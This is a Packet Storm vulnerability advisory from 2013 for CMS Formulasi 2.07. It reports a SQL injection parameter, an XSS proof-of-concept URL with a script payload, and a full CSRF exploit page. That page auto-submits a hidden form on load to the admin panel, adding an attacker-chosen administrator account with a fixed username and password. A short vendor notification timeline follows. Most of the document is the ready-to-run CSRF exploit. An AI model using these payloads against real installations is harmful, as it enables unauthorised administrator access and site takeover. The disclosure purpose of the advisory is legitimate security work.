CMS Formulasi 2.07 XSS / CSRF / SQL Injection

2013-10-04T00:00:00
ID PACKETSTORM:123514
Type packetstorm
Reporter Sarahma Security
Modified 2013-10-04T00:00:00

Description

                                        
                                            `###################################################################################################################  
  
______ __ ______   
/ \ / | / \   
/000000 | ______ ______ ______ 00 |____ _____ ____ ______ /000000 | ______ _______  
00 \__00/ / \ / \ / \ 00 \ / \/ \ / \ 00 \__00/ / \ / |  
00 \ 000000 |/000000 |000000 |0000000 |000000 0000 | 000000 | 00 \ /000000 |/0000000/  
000000 | / 00 |00 | 00/ / 00 |00 | 00 |00 | 00 | 00 | / 00 | 000000 |00 00 |00 |   
/ \__00 |/0000000 |00 | /0000000 |00 | 00 |00 | 00 | 00 |/0000000 | / \__00 |00000000/ 00 \_____  
00 00/ 00 00 |00 | 00 00 |00 | 00 |00 | 00 | 00 |00 00 | 00 00/ 00 |00 |  
000000/ 0000000/ 00/ 0000000/ 00/ 00/ 00/ 00/ 00/ 0000000/ 000000/ 0000000/ 0000000/  
  
  
###################################################################################################################  
  
# Exploit Title: CMS Formulasi 2.07 Multiple Vulnerability  
# Date: 30 Sep 2013  
# Vendor Homepage: http://formulasi.or.id/  
# Software Link: http://cms.formulasi.or.id/p/download-cms-formulasi-terbaru.htm  
# Version: 2.07  
# Tested on: Win 7/Backtrack  
# CVE :  
# Exploit Author: Sarahma Security  
# Author Homepage: http://sarahma.co.id  
# Author Email: research@sarahma.co.id  
  
========================  
SQL Injection  
========================  
Found on  
http://localhost/formulasi/kelas-siswa.html  
parameter : kelas  
post data : kelas=1{SQL_HERE}  
  
  
  
========================  
XSS Vulnerability  
========================  
Found On  
parameter : tgl  
http://localhost/cmsformulasi/index.php?p=tglberita&tgl=<script>alert(123)</script>  
  
  
========================  
CSRF Vulnerability  
========================  
  
  
---------------------BOF--------------------------------------------------  
<html>  
<head>  
<title>Formulasi CRSFT Exploit</title>  
</head>  
  
<body onload="javascript:fireForms()">  
<script language="JavaScript">  
var pauses = new Array( "489","36","27" );  
  
function pausecomp(millis)  
{  
var date = new Date();  
var curDate = null;  
  
do { curDate = new Date(); }  
while(curDate-date < millis);  
}  
  
function fireForms()  
{  
var count = 3;  
var i=0;  
  
for(i=0; i<count; i++)  
{  
document.forms[i].submit();  
  
pausecomp(pauses[i]);  
}  
}  
  
</script>  
<H2>Formulasi CRSFT Exploit</H2>  
<form method="POST" name="form1" action="http://localhost:80/cmsformulasi/adminpanel/aplikasi/admin/admin.php?pilih=admin&untukdi=tambah">  
<input type="hidden" name="nama_admin" value="usernya"/>  
<input type="hidden" name="username" value="Sarahma12"/>  
<input type="hidden" name="email" value="research@sarahma.co.id"/>  
<input type="hidden" name="level_users" value="1"/>  
<input type="hidden" name="password" value="Password12"/>  
<input type="hidden" name="password_lagi" value="Password12"/>  
</form>  
</body>  
</html>  
---------------------EOF--------------------------------------------------  
  
  
========================  
Solution :  
========================  
No Update Until This Advisory published  
  
  
========================  
Timeline:  
========================  
2013-09-27 Provided details vulnerability to vendor  
2013-10-01 Second NotificaTon Vendor  
2013-10-04 No Response From Vendor  
2013-10-05 Advisory published  
  
`